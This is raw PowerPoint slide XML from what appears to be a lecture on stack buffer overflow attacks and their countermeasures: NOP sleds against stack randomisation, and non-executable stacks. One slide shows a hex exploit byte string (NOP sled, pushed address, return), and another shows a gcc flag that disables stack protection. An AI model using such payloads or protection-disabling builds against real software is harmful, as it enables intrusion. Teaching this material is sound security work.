              <a:t>Stack offset’s randomness is bounded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Return address points to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>somewhere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in NOP sled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute all NOPs between there and exploit code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute exploit code</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9" name="Rectangle 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4AEB9E0-9496-BA49-A900-0195313831C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8963628" y="808695"/>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0" name="Rectangle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56DCC13A-05E1-1A4A-A8EB-516648A8C1D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8963628" y="1375855"/>
            <a:ext cx="1469984" cy="496053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exploit code</a:t>
            </a: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r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nop</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nvGrpSpPr>
          <p:cNvPr id="23" name="Group 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2C385E6-FAE5-4745-9595-8D0218BE8899}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8959452" y="5298217"/>
            <a:ext cx="1469978" cy="467508"/>
            <a:chOff x="9124097" y="5147021"/>
            <a:chExt cx="1305335" cy="467508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Rectangle 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DECE674D-B523-3E49-B829-BADED40C93AC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="912409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4D6CA6-2F11-A74D-A2FB-197C04D1C63F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="928642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16E659-AA9D-4648-9A6A-9C1EECB82716}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9448749"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46FE6B-3E5F-F842-AB54-628CCF673B7F}"/>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476E4B-27C0-BC45-B86A-367A623720CC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9778403"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0DE969-539B-8047-84F0-954516EE0AC3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="994095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556F1AF-EC90-444A-8115-6BEE2446ED74}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1010558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D98095-8DFF-3146-8C18-6AAC7B6F32DA}"/>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AAB8784A-15D0-5C4F-9AA9-740285BF92BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6787588" y="5347287"/>
            <a:ext cx="1408527" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="Straight Arrow Connector 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC63F67B-1720-3045-B1A3-34C61D735484}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="32" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8196115" y="5531953"/>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1F77D8A2-E19A-F947-B839-5E6FF01E02DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="19" idx="1"/>
            <a:endCxn id="20" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="8963628" y="1092274"/>
            <a:ext cx="12700" cy="2763849"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5153425"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Up Arrow 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{016AF33A-0045-544C-A8AD-82F79CD5C0EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10172499" y="1690688"/>
            <a:ext cx="328450" cy="22800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619AC79-D315-4849-A122-506ADB1FEB8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10433612" y="2311740"/>
            <a:ext cx="1474121" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute NOPs</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to get to</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>exploit code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="253776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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Refresher on</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Memory Layout</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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="70" name="Straight Connector 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F99A50A-4929-4C48-894D-F074B856E742}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3346693" y="406603"/>
            <a:ext cx="6351927" cy="632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264EEA1-4832-B84C-BF0B-545B4F1BBBD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="11" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3346693" y="1231103"/>
            <a:ext cx="5616935" cy="49407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F797714-2079-F342-BAEF-5A25579E3B3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6787588" y="455730"/>
            <a:ext cx="3646024" cy="5914133"/>
            <a:chOff x="6588078" y="451413"/>
            <a:chExt cx="3646024" cy="5914133"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Rectangle 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ADE7B75-2ACC-E446-98E0-CC155B00DDE9}"/>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2FDA9CBE-0304-674D-A4BF-47844C23A952}"/>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3" name="Rectangle 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B51FFDEB-142D-4048-AB62-03F91861278D}"/>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5" name="Rectangle 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CDB88D6-8825-624C-9CC6-243A712B8E96}"/>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7" name="Rectangle 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4F9C852-A40C-3F4A-A73F-4436081AA8B0}"/>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Saved registers</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&amp;</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>local variables</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="TextBox 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20526AB4-325F-D947-8B47-B893D418BA9A}"/>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9" name="Straight Arrow Connector 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E45171E-3542-2243-9013-94D493C218BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="2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4F15EDEA-CF64-9E4E-AF31-E3AB3A7055F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1876709" y="406603"/>
            <a:ext cx="1469984" cy="6191750"/>
            <a:chOff x="10632621" y="376819"/>
            <a:chExt cx="1469984" cy="6191750"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC7C4400-EA24-D14A-890D-3CE7B13394EF}"/>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0" name="Rectangle 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1A6BBF8-AFFD-B54A-98BD-881940F3BE01}"/>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1" name="Document 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED486A75-0E27-A146-B5D5-3D90CE05D4EC}"/>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2" name="Rectangle 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE7DECB0-A884-5244-9827-CDE2E907B478}"/>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C412BB2C-11D2-7D44-ABAC-AF3C51982CD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4" name="Rectangle 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7B8E799-790A-9640-98F8-680F7F45E80D}"/>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5" name="Straight Arrow Connector 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F2F27C6-69A9-F845-BADD-8D92BF122337}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="12"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Document 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{161B78C6-3A74-4C42-A7E0-1C652D7F8D3E}"/>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7" name="Rectangle 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{671925DF-4169-0442-9B0B-ECCCE80A9BEB}"/>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18" name="Straight Arrow Connector 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A748E03B-9EEB-B24E-9AC5-DC8E718A0EDF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="12"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8CADEF-F149-6645-8127-51590E96A62F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="10"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86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Effect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="10" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.52917 -0.36991 L 0 4.81481E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="26458" y="18495"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="12" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="with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wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="15" presetID="22" presetClass="entr" presetSubtype="8"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Counter-countermeasure</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NOP Sled</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E9D2C9BE-0696-8640-9B49-A1E9AE24A900}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5342710" y="39756"/>
            <a:ext cx="6809534" cy="6779030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rounded Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2966BF5-BD40-8E43-858A-E7FA1C8B74E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1222732" y="3321976"/>
            <a:ext cx="3306053" cy="95236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90 90 90 90 90 90 90 90</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>90 90 68 48 06 40 00 c3 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FC DF FF FF FF 7F 00 00</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="82299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System-Level Protections</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2. Non-Executable Stacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21097E66-B2DC-714C-A83C-922FE0656F5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="369052" y="1825625"/>
            <a:ext cx="4979504" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>16-bit &amp; 32-bit x86</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can mark region of memory as “read-only” or “writable”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can execute code in any region of memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>64-bit x86</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Introduced “execute” permission</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack is non-executable by default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3" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97148676-F5DB-084A-967C-5852ACF56F8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6482945" y="1889773"/>
            <a:ext cx="4277069"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -S has-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1941E182-8981-5C45-9715-93922F0B85D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6990379" y="4330313"/>
            <a:ext cx="3240439" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -std=c99 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Og</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -S has-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rounded Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A5D09F3-0DB0-844B-B45D-AD87A21D88FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5142968" y="2275505"/>
            <a:ext cx="6935263" cy="1547312"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:lumOff val="15000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="6350">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:extLst>
              <a:ext uri="{C807C97D-BFC1-408E-A445-0C87EB9F89A2}">
                <ask:lineSketchStyleProps xmlns:ask="http://schemas.microsoft.com/office/drawing/2018/sketchyshapes" sd="1219033472">
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="connsiteX0" fmla="*/ 0 w 6935263"/>
                      <a:gd name="connsiteY0" fmla="*/ 257890 h 1547312"/>
                      <a:gd name="connsiteX1" fmla="*/ 257890 w 6935263"/>
                      <a:gd name="connsiteY1" fmla="*/ 0 h 1547312"/>
                      <a:gd name="connsiteX2" fmla="*/ 841479 w 6935263"/>
                      <a:gd name="connsiteY2" fmla="*/ 0 h 1547312"/>
                      <a:gd name="connsiteX3" fmla="*/ 1489264 w 6935263"/>
                      <a:gd name="connsiteY3" fmla="*/ 0 h 1547312"/>
                      <a:gd name="connsiteX4" fmla="*/ 1944463 w 6935263"/>
                      <a:gd name="connsiteY4" fmla="*/ 0 h 1547312"/>
                      <a:gd name="connsiteX5" fmla="*/ 2335468 w 6935263"/>
                      <a:gd name="connsiteY5" fmla="*/ 0 h 1547312"/>
                      <a:gd name="connsiteX6" fmla="*/ 2790668 w 6935263"/>
                      <a:gd name="connsiteY6" fmla="*/ 0 h 1547312"/>
                      <a:gd name="connsiteX7" fmla="*/ 3310062 w 6935263"/>
                      <a:gd name="connsiteY7" fmla="*/ 0 h 1547312"/>
                      <a:gd name="connsiteX8" fmla="*/ 3893652 w 6935263"/>
                      <a:gd name="connsiteY8" fmla="*/ 0 h 1547312"/>
                      <a:gd name="connsiteX9" fmla="*/ 4348851 w 6935263"/>
                      <a:gd name="connsiteY9" fmla="*/ 0 h 1547312"/>
                      <a:gd name="connsiteX10" fmla="*/ 5060830 w 6935263"/>
                      <a:gd name="connsiteY10" fmla="*/ 0 h 1547312"/>
                      <a:gd name="connsiteX11" fmla="*/ 5644420 w 6935263"/>
                      <a:gd name="connsiteY11" fmla="*/ 0 h 1547312"/>
                      <a:gd name="connsiteX12" fmla="*/ 6677373 w 6935263"/>
                      <a:gd name="connsiteY12" fmla="*/ 0 h 1547312"/>
                      <a:gd name="connsiteX13" fmla="*/ 6935263 w 6935263"/>
                      <a:gd name="connsiteY13" fmla="*/ 257890 h 1547312"/>
                      <a:gd name="connsiteX14" fmla="*/ 6935263 w 6935263"/>
                      <a:gd name="connsiteY14" fmla="*/ 794287 h 1547312"/>
                      <a:gd name="connsiteX15" fmla="*/ 6935263 w 6935263"/>
                      <a:gd name="connsiteY15" fmla="*/ 1289422 h 1547312"/>
                      <a:gd name="connsiteX16" fmla="*/ 6677373 w 6935263"/>
                      <a:gd name="connsiteY16" fmla="*/ 1547312 h 1547312"/>
                      <a:gd name="connsiteX17" fmla="*/ 6029589 w 6935263"/>
                      <a:gd name="connsiteY17" fmla="*/ 1547312 h 1547312"/>
